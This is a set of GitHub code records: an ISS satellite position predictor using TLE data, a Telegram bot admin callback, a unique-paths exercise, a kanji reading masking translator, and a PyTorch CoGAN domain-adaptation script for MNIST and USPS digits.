get_raw_tle_from_tstamp(ts) # get the TLE\n if full_output:\n return (l1, l2, ts, False, -1)\n else: return (l1, l2)\n elif full_output:\n return (None, None, ts, False, -1)\n else:\n raise IndexError('Could not find valid TLE.') # no can do\n else: # already in DB\n idx = np.where(lows != 0)[0]\n dts = tledb.timestamp.values[idx]\n tles = tledb.sel(dict(timestamp=dts))\n l1 = tles.line1.values[0]\n l2 = tles.line2.values[0]\n if full_output:\n return (l1, l2, dts[0], True, idx)\n else: return (l1, l2)\n# %%\ndef ISSLatLonFromTstamp(ts: datetime | np.datetime64, *, database_fname: str = None, allowdownload: bool=True) -> Tuple[Numeric, Numeric, Numeric]:\n \"\"\"Get latitude, longitude for a given timestamp using ISS TLE database.\n\n Args:\n ts (datetime | np.datetime64): Timestamp for evaluation, must be timezone aware in case of datetime.\n database_fname (str, optional): TLE dataset file (loaded using xarray.load_dataset). The dataset file must contain a timestamp (coordinate) for when the TLE is valid, and data_vars line1 and line2 containing the two TLE lines. 
Defaults to 'ISS_TLE_DB.nc'.\n allowdownload (bool, optional): Allow download of TLE not found in DB.\n\n Raises:\n ValueError: Timestamp must be timezone aware.\n IndexError: Could not find valid TLE in the dataset (allowdownload=False).\n RuntimeError: Could not download valid TLE (allowdownload=True, database does not contain valid epoch).\n\n Returns:\n Tuple[Numeric, Numeric, Numeric]: (latitude, longitude, altitude) in degrees (-180, 180) and km.\n \"\"\"\n if isinstance(ts, datetime):\n if ts.tzinfo is None:\n raise ValueError('Timestamp must be timezone aware')\n ts = datetime.utcfromtimestamp(ts.astimezone(tz = pytz.utc).timestamp())\n elif isinstance(ts, np.datetime64):\n ts = datetime.utcfromtimestamp(int(ts)*1e-9)\n l1, l2 = ISSTleFromTstamp(ts, database_fname=database_fname, allowdownload=allowdownload)\n tle = ephem.readtle('GENERIC', l1, l2)\n try:\n tle.compute(ts)\n except Exception as e:\n outstr = f'Could not compute TLE for {ts} (epoch {EpochFromTle(l1)}): {str(e)}\\n'\n raise RuntimeError(outstr)\n return (np.rad2deg(float(tle.sublat)), np.rad2deg(float(tle.sublong)), tle.elevation*1e-3)\n# %%\nif __name__ == '__main__':\n ts = pytz.timezone('US/Eastern').localize(datetime(2017, 4, 1, 0, 0, 1))\n print(ts, ISSTleFromTstamp(ts, full_output=True)[2:])\n print(ts, ISSLatLonFromTstamp(ts))\n# %%\n","repo_name":"sunipkm/skmpython","sub_path":"skmpython/SatPosPredict/_pospredict.py","file_name":"_pospredict.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
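EpochFromTle's two-digit-year and fractional-day arithmetic is the easiest thing in this module to get wrong, so a worked check helps; the TLE line below is synthetic, shaped only so the [18:32] epoch slice lands on '21123.50000000' (year 21 => 2021, day 123, 0.5 day = noon UTC, i.e. 2021-05-03 12:00):

# EpochFromTle is defined in the record above; the line 1 string is made up.
line1 = "1 25544U 98067A   21123.50000000  .00000000  00000-0  00000-0 0  9990"
print(EpochFromTle(line1))  # 2021-05-03 12:00:00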
+{"seq_id":"39265794655","text":"from loader import bot\nfrom utils.json_worker.users import delete_admin, get_admins, get_users, give_admin\n\n\nasync def action_Aadd(callback):\n admin_to_add_user_id = callback.data.split('?')[1]\n sender_user_id = callback.data.split('?')[2]\n add_admin_username = (await get_users())[admin_to_add_user_id]['username']\n await give_admin(admin_to_add_user_id)\n await callback.answer(\"Действие подтверждено\")\n await callback.message.delete()\n await bot.send_message(chat_id=sender_user_id,\n text=f\"Ваше предложение добавить адммина {add_admin_username} было выполнено.\")","repo_name":"SNI4/tg_filmbot","sub_path":"handlers/callbacks_actions/Aadd.py","file_name":"Aadd.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21778645218","text":"def uniquePaths(m, n):\n matrix = []\n matrix.append([1]*n)\n for i in range(1, m):\n row = [0]*n\n for j in range(n):\n if j == 0: row[j] = 1\n else: row[j] = row[j-1] + matrix[i-1][j]\n matrix.append(row)\n print(matrix)\n return matrix[-1][-1]\n\ndata = [\n (3, 7),\n (3, 2),\n (7, 3),\n (3, 3)\n]\nfor test_tuple in data:\n print(uniquePaths(*test_tuple))\n","repo_name":"pratikdk/dsaprobs_s1","sub_path":"array/12_62_unique_paths.py","file_name":"12_62_unique_paths.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6898816073","text":"import pickle\nimport utils.stringutils as stringutils\nimport os\nfrom utils.params import *\n\nwith open(os.path.join(ROOT_DIR, \"bin_blobs/JMdict_e_hashtable.pkl\"), 'rb') as f:\n word_dict = pickle.load(f)\n\nwith open(os.path.join(ROOT_DIR, \"bin_blobs/kanjidic2_hashtable.pkl\"), 'rb') as f:\n kanji_dict = pickle.load(f)\n\nwith open(os.path.join(ROOT_DIR, \"translator_subsystem/masked_kanji.pkl\"), 'rb') as f:\n masked_kanji_set = pickle.load(f)\n\n\nclass NoValidCombinationOfReadingsFoundError(Exception):\n pass\n\n\ndef find_exact_match(keb: str):\n return word_dict[keb]\n\n\ndef translate_sequence_recursively(sequence: str, n_leading_kanji: int):\n # print(\"trying to translate {}\".format(sequence))\n if sequence == \"\" or n_leading_kanji <= 0:\n return [(len(sequence), sequence, sequence)]\n current_len = len(sequence)\n while current_len > 0:\n try:\n reading = find_exact_match(sequence[:current_len])\n remaining_readings = translate_sequence_recursively(sequence[current_len:], n_leading_kanji - current_len)\n remaining_readings.append((current_len, sequence[:current_len], reading))\n return remaining_readings\n except KeyError:\n current_len -= 1\n raise KeyError\n\n\ndef translate_sequence(sequence: str, n_leading_kanji: int):\n current_len = len(sequence)\n while current_len > 0:\n try:\n translation = translate_sequence_recursively(sequence[:current_len], min(n_leading_kanji, current_len))\n translation.reverse()\n # translation = translation[:-1]\n return current_len, translation\n except KeyError:\n current_len -= 1\n return 0, []\n\n\ndef requires_masking(kanji: str):\n return kanji in masked_kanji_set\n\n\ndef find_masking_positions(keb: str):\n masking_positions = []\n for i_tmp in range(len(keb)):\n if requires_masking(keb[i_tmp]):\n masking_positions.append(i_tmp)\n return masking_positions\n\n\ndef segment_reading_recursively(reading: str, keb: str, include_name_readings: bool = False):\n\n # end of recursion reached, create list and pass upward if reading characters were used up,\n # raise exception otherwise\n if keb == \"\":\n if reading == \"\":\n return []\n else:\n raise NoValidCombinationOfReadingsFoundError\n\n # process the last kanji in keb\n kanji = keb[len(keb)-1]\n # get all readings\n readings, readings_nanori = kanji_dict[kanji]\n # if name readings are to be included, add them to the rear of the list of normal readings\n if include_name_readings:\n readings += readings_nanori\n # find a matching reading that allows for the rest of the word to still be segmented correctly\n for partial_reading in readings:\n # if this reading of the kanji fits the end of the current portion of the word, try it\n if reading.endswith(partial_reading):\n try:\n # try to segment the remainder of the word\n segmented_reading = segment_reading_recursively(\n reading[:-len(partial_reading)], keb[:-1], include_name_readings=include_name_readings\n )\n # if successful, append this partial_reading and return\n segmented_reading.append(partial_reading)\n return segmented_reading\n # if the rest of the reading was not correctly segmentable, pass this partial_reading and try the next one\n except NoValidCombinationOfReadingsFoundError:\n continue\n\n # none of the readings for this kanji fitted or allowed for the remainder of the word to be segmented,\n # pass exception upward\n raise NoValidCombinationOfReadingsFoundError\n\n\ndef segment_reading(reading: str, keb: str, n_leading_kanji: int, include_name_readings: bool = False):\n if 
n_leading_kanji < len(keb):\n number_of_trailing_hiragana = len(keb) - n_leading_kanji # >= 1\n segmented_reading = segment_reading_recursively(\n reading[:-number_of_trailing_hiragana], keb[:-number_of_trailing_hiragana],\n include_name_readings=include_name_readings\n )\n # if successful, append this partial_reading and return\n segmented_reading.append(reading[-number_of_trailing_hiragana:])\n return segmented_reading\n else:\n return segment_reading_recursively(reading, keb, include_name_readings=include_name_readings)\n\n\ndef mask_word(reading: str, keb: str, n_leading_kanji: int):\n masking_positions = find_masking_positions(keb)\n if not masking_positions: # eq. masking_positions == []\n return reading\n try:\n segmented_reading = segment_reading(reading, keb, n_leading_kanji)\n except NoValidCombinationOfReadingsFoundError:\n segmented_reading = segment_reading(reading, keb, n_leading_kanji, include_name_readings=True)\n\n # mask reading of hidden kanji\n for position in masking_positions:\n # \"maru\" for censored character. note that one '〇' can cover several kana, but always exactly one kanji\n segmented_reading[position] = \"〇\"\n\n # join modified segmented reading into single string\n masked_reading = \"\"\n for partial_reading in segmented_reading:\n masked_reading += partial_reading\n\n return masked_reading\n\n\ndef translate_and_mask_sequence(sequence: str, n_leading_kanji: int):\n used_chars, translated_sequence = translate_sequence(sequence=sequence, n_leading_kanji=n_leading_kanji)\n masked_sequence = []\n n_leading_lanji_tmp = n_leading_kanji\n for word in translated_sequence:\n n_leading_kanji_local = min(len(word[1]), n_leading_lanji_tmp)\n try:\n masked_reading = mask_word(reading=word[2], keb=word[1], n_leading_kanji=n_leading_kanji_local)\n except NoValidCombinationOfReadingsFoundError: # if no valid combination of basic readings found...\n if all(requires_masking(kanji) for kanji in word[1][:n_leading_kanji_local]):\n masked_reading = \"\".join([\"〇\" for _ in range(n_leading_kanji_local)])\n else:\n masked_reading = word[2]\n # reduce leading kanji count so it representes the number of leading kanji in the remaining sequence\n n_leading_lanji_tmp -= min(len(word[1]), n_leading_lanji_tmp)\n masked_sequence.append((word[0], word[1], masked_reading))\n return masked_sequence # used_chars, masked_sequence\n\n\ndef translate_and_mask_line(line: str):\n \"\"\"\n translate and mask a whole line (several concatenated sequences)\n :param line: the line to translate\n :return: the list of translated and masked sequences, each with their length (char count) and leading kanji count\n \"\"\"\n current_sequence_start = 0\n last_char_was_kana = False\n translated_and_masked_sequences = []\n number_of_kanji = 0\n # process each char\n for i in range(len(line)):\n # if current char is kana, mark it as such and continue\n if stringutils.is_kana(line[i]):\n last_char_was_kana = True\n # if it is kanji...\n else:\n # ... and the last char was kana, this is the beginning of a new sequence, and the old/finished sequence\n # can be processed and saved\n if last_char_was_kana:\n # translate this sequence and save it\n translated_and_masked_sequences.append(\n (\n translate_and_mask_sequence(line[current_sequence_start:i], number_of_kanji),\n i - current_sequence_start,\n number_of_kanji\n )\n )\n # reset kanji counter, set start index of next sequence\n current_sequence_start = i\n number_of_kanji = 1\n # ... 
otherwise, just count the kanji\n else:\n number_of_kanji += 1\n # and mark this char as kanji for the next iteration\n last_char_was_kana = False\n # translate the last sequence and save it\n translated_and_masked_sequences.append(\n (\n translate_and_mask_sequence(line[current_sequence_start:], number_of_kanji),\n len(line) - current_sequence_start,\n number_of_kanji\n )\n )\n return translated_and_masked_sequences\n\n\n\ndef overwrite_masked_kanji_set(new_set: set):\n global masked_kanji_set\n masked_kanji_set = new_set\n\n\ndef reset_masked_kanji_set():\n global masked_kanji_set\n with open(os.path.join(ROOT_DIR, \"translator_subsystem/masked_kanji.pkl\"), 'rb') as f:\n masked_kanji_set = pickle.load(f)\n\n\nif __name__ == \"__main__\":\n\n print(translate_and_mask_sequence(\"日本語\", 3))\n","repo_name":"011000101101/VRAR_project","sub_path":"translator_subsystem/lut_translator.py","file_name":"lut_translator.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
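The core of lut_translator is segment_reading_recursively: consume the word from the right, try every dictionary reading that is a suffix of the remaining kana, and backtrack on dead ends. A self-contained miniature of that backtracking search, with a toy reading table and Latin letters standing in for kanji and kana (and returning None on failure instead of raising, unlike the original), so it runs without the pickled dictionaries:

# Toy reading table: each "kanji" maps to its possible "kana" readings.
READINGS = {'A': ['ab', 'a'], 'B': ['ba', 'b']}

def segment(reading, word):
    # One valid right-to-left segmentation of `reading` over `word`, or None.
    if not word:
        return [] if not reading else None
    for r in READINGS[word[-1]]:
        if reading.endswith(r):
            rest = segment(reading[:-len(r)], word[:-1])
            if rest is not None:
                return rest + [r]
    return None

print(segment('aba', 'AB'))  # ['a', 'ba']
print(segment('xx', 'AB'))   # None: backtracking exhausts every combination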
+{"seq_id":"27630282921","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# #### Imports\r\n\r\n# In[1]:\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nimport os\r\nimport urllib\r\nimport gzip\r\nimport pickle\r\nimport numpy as np\r\nfrom os.path import dirname\r\nimport random\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.init as init\r\nimport torch.utils.data\r\nimport torchvision\r\nimport torchvision.datasets as dset\r\nimport torchvision.transforms as transforms\r\nimport torch.nn.functional as F\r\n\r\n\r\n\r\n\r\n# In[2]:\r\n\r\n\r\n# #### Variables and parameters\r\n\r\n# In[3]:\r\n\r\n# Sourse and target datasets can be set here manually\r\n\r\ns = 'mnist'\r\nt = 'usps'\r\nroot_dir = '~/dataset'\r\n\r\nprocs = 2\r\nbatchsize = 128 \r\ntot_iter = 30000 # number of epochs \r\nz_dim = 100 # dimension of random noise\r\nlrCl = 0.0002 # learning rate \r\nlrGen = 0.0002 # learning rate \r\nbeta1 = 0.5 # beta1 for adam. 0.5)\r\nbeta2 = 0.999 # beta2 for adam\r\nweight_decay = 0.0005 # weight_decay\r\n\r\nt_iter = 500 # testiter\r\n\r\n\r\n# #### Dataset preprocessing\r\n\r\n# In[4]:\r\n\r\n\r\nDataAttDict = {\r\n'mnist': (1,28),\r\n'mnistm': (3,28),\r\n'usps': (1,28),\r\n'svhn': (3,32),\r\n}\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nclass Logger(object):\r\n def __init__(self, filepath = \"./log.txt\", mode = \"w\", stdout = None):\r\n if stdout==None:\r\n self.terminal = sys.stdout\r\n else:\r\n self.terminal = stdout\r\n os.makedirs(dirname(filepath), exist_ok=True)\r\n self.log = open(filepath, mode)\r\n\r\n def write(self, message):\r\n self.terminal.write(message)\r\n self.log.write(message)\r\n self.log.flush()\r\n os.fsync(self.log)\r\n\r\n def flush(self):\r\n #this flush method is needed for python 3 compatibility.\r\n #this handles the flush command by doing nothing.\r\n #you might want to specify some extra behavior here.\r\n pass\r\n\r\n# def InfIter(_loader):\r\n# return iter(InfIter_C(_loader))\r\n\r\nclass InfIter:\r\n def __init__(self,_loader):\r\n self._loader = _loader\r\n self._iter = iter(_loader)\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n try:\r\n return self._iter.next()\r\n except StopIteration:\r\n self._iter = iter(self._loader)\r\n return self._iter.next()\r\n\r\n##### define dataset\r\n\"\"\"Dataset setting and data loader for MNIST-M.\r\nModified from\r\nhttps://github.com/pytorch/vision/blob/master/torchvision/datasets/mnist.py\r\nCREDIT: https://github.com/corenel\r\n\"\"\"\r\nimport errno\r\nimport os\r\n\r\nimport torch\r\nimport torch.utils.data as data\r\nfrom PIL import Image\r\n\r\n\r\nclass MNISTM(data.Dataset):\r\n \"\"\"`MNIST-M Dataset.\"\"\"\r\n\r\n url = \"https://github.com/VanushVaswani/keras_mnistm/releases/download/1.0/keras_mnistm.pkl.gz\"\r\n\r\n raw_folder = 'raw'\r\n processed_folder = 'processed'\r\n training_file = 'mnist_m_train.pt'\r\n test_file = 'mnist_m_test.pt'\r\n\r\n def __init__(self,\r\n root, mnist_root=\"data\",\r\n train=True,\r\n transform=None, target_transform=None,\r\n download=False):\r\n \"\"\"Init MNIST-M dataset.\"\"\"\r\n super(MNISTM, self).__init__()\r\n self.root = os.path.expanduser(root)\r\n self.mnist_root = os.path.expanduser(mnist_root)\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.train = train # training set or test set\r\n\r\n if download:\r\n self.download()\r\n\r\n if not self._check_exists():\r\n raise RuntimeError('Dataset not found.' 
+\r\n ' You can use download=True to download it')\r\n\r\n if self.train:\r\n self.train_data, self.train_labels = torch.load(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file))\r\n else:\r\n self.test_data, self.test_labels = torch.load(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file))\r\n\r\n def __getitem__(self, index):\r\n \"\"\"Get images and target for data loader.\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n if self.train:\r\n img, target = self.train_data[index], self.train_labels[index]\r\n else:\r\n img, target = self.test_data[index], self.test_labels[index]\r\n\r\n # doing this so that it is consistent with all other datasets\r\n # to return a PIL Image\r\n img = Image.fromarray(img.squeeze().numpy(), mode='RGB')\r\n\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n \"\"\"Return size of dataset.\"\"\"\r\n if self.train:\r\n return len(self.train_data)\r\n else:\r\n return len(self.test_data)\r\n\r\n def _check_exists(self):\r\n return os.path.exists(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file)) and \\\r\n os.path.exists(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file))\r\n\r\n def download(self):\r\n \"\"\"Download the MNIST data.\"\"\"\r\n # import essential packages\r\n from six.moves import urllib\r\n import gzip\r\n import pickle\r\n from torchvision import datasets\r\n\r\n # check if dataset already exists\r\n if self._check_exists():\r\n return\r\n\r\n # make data directories\r\n try:\r\n os.makedirs(os.path.join(self.root, self.raw_folder))\r\n os.makedirs(os.path.join(self.root, self.processed_folder))\r\n except OSError as e:\r\n if e.errno == errno.EEXIST:\r\n pass\r\n else:\r\n raise\r\n\r\n # download pkl files\r\n print('Downloading ' + self.url)\r\n filename = self.url.rpartition('/')[2]\r\n file_path = os.path.join(self.root, self.raw_folder, filename)\r\n if not os.path.exists(file_path.replace('.gz', '')):\r\n data = urllib.request.urlopen(self.url)\r\n with open(file_path, 'wb') as f:\r\n f.write(data.read())\r\n with open(file_path.replace('.gz', ''), 'wb') as out_f, gzip.GzipFile(file_path) as zip_f:\r\n out_f.write(zip_f.read())\r\n os.unlink(file_path)\r\n\r\n # process and save as torch files\r\n print('Processing...')\r\n\r\n # load MNIST-M images from pkl file\r\n with open(file_path.replace('.gz', ''), \"rb\") as f:\r\n mnist_m_data = pickle.load(f, encoding='bytes')\r\n mnist_m_train_data = torch.ByteTensor(mnist_m_data[b'train'])\r\n mnist_m_test_data = torch.ByteTensor(mnist_m_data[b'test'])\r\n\r\n # get MNIST labels\r\n mnist_train_labels = datasets.MNIST(root=self.mnist_root,\r\n train=True,\r\n download=True).train_labels\r\n mnist_test_labels = datasets.MNIST(root=self.mnist_root,\r\n train=False,\r\n download=True).test_labels\r\n\r\n # save MNIST-M dataset\r\n training_set = (mnist_m_train_data, mnist_train_labels)\r\n test_set = (mnist_m_test_data, mnist_test_labels)\r\n with open(os.path.join(self.root,\r\n self.processed_folder,\r\n self.training_file), 'wb') as f:\r\n torch.save(training_set, f)\r\n with open(os.path.join(self.root,\r\n self.processed_folder,\r\n self.test_file), 'wb') as f:\r\n torch.save(test_set, f)\r\n\r\n print('Done!')\r\n\r\n\r\nclass USPS(data.Dataset):\r\n \"\"\"USPS 
Dataset.\r\n Args:\r\n root (string): Root directory of dataset where dataset file exist.\r\n train (bool, optional): If True, resample from dataset randomly.\r\n download (bool, optional): If true, downloads the dataset\r\n from the internet and puts it in root directory.\r\n If dataset is already downloaded, it is not downloaded again.\r\n transform (callable, optional): A function/transform that takes in\r\n an PIL image and returns a transformed version.\r\n E.g, ``transforms.RandomCrop``\r\n \"\"\"\r\n\r\n url = \"https://raw.githubusercontent.com/mingyuliutw/CoGAN/master/cogan_pytorch/data/uspssample/usps_28x28.pkl\"\r\n\r\n def __init__(self, root, train=True, transform=None, download=False):\r\n \"\"\"Init USPS dataset.\"\"\"\r\n # init params\r\n self.root = os.path.expanduser(root)\r\n self.filename = \"usps_28x28.pkl\"\r\n self.train = train\r\n # Num of Train = 7438, Num ot Test 1860\r\n self.transform = transform\r\n self.dataset_size = None\r\n\r\n # download dataset.\r\n if download:\r\n self.download()\r\n if not self._check_exists():\r\n raise RuntimeError(\"Dataset not found.\" +\r\n \" You can use download=True to download it\")\r\n\r\n self.train_data, self.train_labels = self.load_samples()\r\n if self.train:\r\n total_num_samples = self.train_labels.shape[0]\r\n indices = np.arange(total_num_samples)\r\n np.random.shuffle(indices)\r\n self.train_data = self.train_data[indices[0:self.dataset_size], ::]\r\n self.train_labels = self.train_labels[indices[0:self.dataset_size]]\r\n self.train_data = self.train_data.transpose(\r\n (0, 2, 3, 1)) # convert to HWC\r\n\r\n def __getitem__(self, index):\r\n \"\"\"Get images and target for data loader.\r\n Args:\r\n index (int): Index\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n img, label = self.train_data[index, ::], self.train_labels[index]\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n label = np.long(label)\r\n # label = torch.LongTensor([np.int64(label).item()])\r\n # label = torch.FloatTensor([label.item()])\r\n return img, label\r\n\r\n def __len__(self):\r\n \"\"\"Return size of dataset.\"\"\"\r\n return self.dataset_size\r\n\r\n def _check_exists(self):\r\n \"\"\"Check if dataset is download and in right place.\"\"\"\r\n return os.path.exists(os.path.join(self.root, self.filename))\r\n\r\n def download(self):\r\n \"\"\"Download dataset.\"\"\"\r\n filename = os.path.join(self.root, self.filename)\r\n dirname = os.path.dirname(filename)\r\n if not os.path.isdir(dirname):\r\n os.makedirs(dirname)\r\n if os.path.isfile(filename):\r\n return\r\n print(\"Download %s to %s\" % (self.url, os.path.abspath(filename)))\r\n urllib.request.urlretrieve(self.url, filename)\r\n print(\"[DONE]\")\r\n return\r\n\r\n def load_samples(self):\r\n \"\"\"Load sample images from dataset.\"\"\"\r\n filename = os.path.join(self.root, self.filename)\r\n f = gzip.open(filename, \"rb\")\r\n data_set = pickle.load(f, encoding=\"bytes\")\r\n f.close()\r\n if self.train:\r\n images = data_set[0][0]\r\n labels = data_set[0][1]\r\n self.dataset_size = labels.shape[0]\r\n else:\r\n images = data_set[1][0]\r\n labels = data_set[1][1]\r\n self.dataset_size = labels.shape[0]\r\n return images, labels\r\n\r\n\r\n# In[18]:\r\n\r\n\r\ndef createDataset(dataname, train):\r\n if dataname == \"mnist\":\r\n return dset.MNIST(root=root_dir+'/mnist', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"mnistm\":\r\n return 
MNISTM(root=root_dir+'/mnistm', mnist_root=root_dir+'/mnist', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"usps\":\r\n return USPS(root=root_dir+'/usps', train=train, download=True,\r\n transform=transforms.Compose([\r\n transforms.ToTensor()\r\n ]))\r\n if dataname == \"svhn\":\r\n return dset.SVHN(root=root_dir+'/svhn', split=(\"train\" if train else \"test\"), download=True,\r\n transform=transforms.Compose([\r\n transforms.Resize(28),\r\n transforms.ToTensor()\r\n ]))\r\n\r\n\r\n# #### Loss functions\r\n\r\n# In[7]:\r\n\r\n\r\ndef loss(x):\r\n return (F.softplus(x)).mean()\r\n\r\n\r\n# #### Neural net class\r\n\r\n# In[33]:\r\n\r\n\r\nclass CoDis28x28(nn.Module):\r\n def __init__(self, ch_s, imsize_s, ch_t, imsize_t):\r\n super(CoDis28x28, self).__init__()\r\n self.conv0_s = nn.Conv2d(ch_s, 20, kernel_size=5, stride=1, padding=0)\r\n self.conv0_t = nn.Conv2d(ch_t, 20, kernel_size=5, stride=1, padding=0)\r\n self.pool0 = nn.MaxPool2d(kernel_size=2)\r\n self.conv1 = nn.Conv2d(20, 50, kernel_size=5, stride=1, padding=0)\r\n self.pool1 = nn.MaxPool2d(kernel_size=2)\r\n self.conv2 = nn.Conv2d(50, 500, kernel_size=4, stride=1, padding=0)\r\n self.prelu2 = nn.PReLU()\r\n self.conv30_s = nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0)\r\n self.prelu3_s = nn.PReLU()\r\n self.conv31_s = nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n self.conv30_t = nn.Conv2d(500, 100, kernel_size=1, stride=1, padding=0)\r\n self.prelu3_t = nn.PReLU()\r\n self.conv31_t = nn.Conv2d(100, 1, kernel_size=1, stride=1, padding=0)\r\n self.conv_cl = nn.Conv2d(500, 10, kernel_size=1, stride=1, padding=0)\r\n\r\n def forward(self, x_s, x_t):\r\n h0_s = self.pool0(self.conv0_s(x_s))\r\n h0_t = self.pool0(self.conv0_t(x_t))\r\n h1_s = self.pool1(self.conv1(h0_s))\r\n h1_t = self.pool1(self.conv1(h0_t))\r\n h2_s = self.prelu2(self.conv2(h1_s))\r\n h2_t = self.prelu2(self.conv2(h1_t))\r\n h3_s = self.conv31_s(self.prelu3_s(self.conv30_s(h2_s)))\r\n h3_t = self.conv31_t(self.prelu3_t(self.conv30_t(h2_t)))\r\n return h3_s, h2_s, h0_s, h3_t, h2_t, h0_t\r\n\r\n def pred_s(self, x_s):\r\n h0_s = self.pool0(self.conv0_s(x_s))\r\n h1_s = self.pool1(self.conv1(h0_s))\r\n h2_s = self.prelu2(self.conv2(h1_s))\r\n h3_s = self.conv_cl(h2_s)\r\n return h3_s.squeeze(), h2_s.squeeze()\r\n\r\n def pred_t(self, x_t):\r\n h0_t = self.pool0(self.conv0_t(x_t))\r\n h1_t = self.pool1(self.conv1(h0_t))\r\n h2_t = self.prelu2(self.conv2(h1_t))\r\n h3_t = self.conv_cl(h2_t)\r\n return h3_t.squeeze(), h2_t.squeeze()\r\n\r\n def pred_fromrep(self, h2):\r\n return self.conv_cl(h2).squeeze()\r\n\r\n\r\n# Generator Model\r\nclass CoGen28x28(nn.Module):\r\n def __init__(self, ch_s, imsize_s, ch_t, imsize_t, zsize):\r\n super(CoGen28x28, self).__init__()\r\n self.dconv0 = nn.ConvTranspose2d(zsize, 1024, kernel_size=4, stride=1)\r\n self.bn0 = nn.BatchNorm2d(1024, affine=False)\r\n self.prelu0 = nn.PReLU()\r\n self.dconv1 = nn.ConvTranspose2d(1024, 512, kernel_size=3, stride=2, padding=1)\r\n self.bn1 = nn.BatchNorm2d(512, affine=False)\r\n self.prelu1 = nn.PReLU()\r\n self.dconv2 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1)\r\n self.bn2 = nn.BatchNorm2d(256, affine=False)\r\n self.prelu2 = nn.PReLU()\r\n self.dconv3 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1)\r\n self.bn3 = nn.BatchNorm2d(128, affine=False)\r\n self.prelu3 = nn.PReLU()\r\n self.dconv4_s = nn.ConvTranspose2d(128, ch_s, kernel_size=6, stride=1, 
padding=1)\r\n self.dconv4_t = nn.ConvTranspose2d(128, ch_t, kernel_size=6, stride=1, padding=1)\r\n self.sig4_s = nn.Sigmoid()\r\n self.sig4_t = nn.Sigmoid()\r\n\r\n def forward(self, z):\r\n z = z.view(z.size(0), z.size(1), 1, 1)\r\n h0 = self.prelu0(self.bn0(self.dconv0(z)))\r\n h1 = self.prelu1(self.bn1(self.dconv1(h0)))\r\n h2 = self.prelu2(self.bn2(self.dconv2(h1)))\r\n h3 = self.prelu3(self.bn3(self.dconv3(h2)))\r\n out_s = self.sig4_s(self.dconv4_s(h3))\r\n out_t = self.sig4_t(self.dconv4_t(h3))\r\n return out_s, out_t\r\n\r\n\r\n# #### To be determined\r\n\r\n# In[9]:\r\n\r\n\r\ndef xavier_weights_init(m):\r\n classname = m.__class__.__name__\r\n # print(classname)\r\n if classname.find('Conv') != -1:\r\n init.xavier_uniform_(m.weight, gain=np.sqrt(2))\r\n init.constant_(m.bias, 0.1)\r\n\r\nclass C_contour(nn.Module):\r\n def __init__(self):\r\n super(C_contour, self).__init__()\r\n self.L1 = nn.Conv2d(3, 1, 3, bias=False)\r\n C1 = np.array([[-1,0,1],[-2,0,2], [-1,0,1]])\r\n C1 = torch.from_numpy(C1)\r\n list(self.L1.parameters())[0].data[0,:,:,:] = C1.unsqueeze(0)\r\n list(self.L1.parameters())[0].requires_grad = False\r\n\r\n self.L2 = nn.Conv2d(3, 1, 3, bias=False)\r\n C2 = np.array([[1,2,1],[0,0,0], [-1,-2,-1]])\r\n C2 = torch.from_numpy(C2)\r\n list(self.L2.parameters())[0].data[0,:,:,:] = C2.unsqueeze(0)\r\n list(self.L2.parameters())[0].requires_grad = False\r\n\r\n def forward(self, x, y):\r\n if x.shape[1] == 1:\r\n x = torch.cat([x,x,x],1)\r\n if y.shape[1] == 1:\r\n y = torch.cat([y,y,y],1)\r\n imgx1 = self.L1(x)\r\n imgx2 = self.L2(x)\r\n\r\n imgy1 = self.L1(y)\r\n imgy2 = self.L2(y)\r\n# img = img.view(img.shape[0], *img_shape)\r\n return torch.norm(imgx1-imgy1)+torch.norm(imgx2-imgy2)\r\n\r\n\r\n# ##### Test function\r\n\r\n# In[10]:\r\n\r\n\r\ndef test_f(verbose = True, print_period = 100):\r\n # VALIDATION\r\n j = 0\r\n cum_acc = 0\r\n total_len = 0\r\n\r\n netCl.eval()\r\n for y, y_label in dataloader_y:\r\n j = j+1\r\n\r\n y = y.to(device)\r\n y_label = y_label.to(device)\r\n\r\n # compute output\r\n outputs, _ = netCl.pred_t(y)\r\n test_loss = criterion(outputs, y_label)\r\n\r\n pred = torch.argmax(outputs,dim=-1)\r\n test_acc = torch.sum(pred==y_label).item()\r\n cum_acc = cum_acc+test_acc\r\n test_acc = test_acc/len(pred)\r\n total_len += len(pred)\r\n if j%print_period==0 and verbose:\r\n print('Iter: [%d/%d], Test Loss: %.8f, Test Acc: %.2f' % (j,len(dataloader_y),test_loss, test_acc))\r\n print(' Test acc for the epoch: %.8f\\n##############################################' % (cum_acc/total_len))\r\n return cum_acc/total_len\r\n\r\n\r\n# ##### Visualization and learning 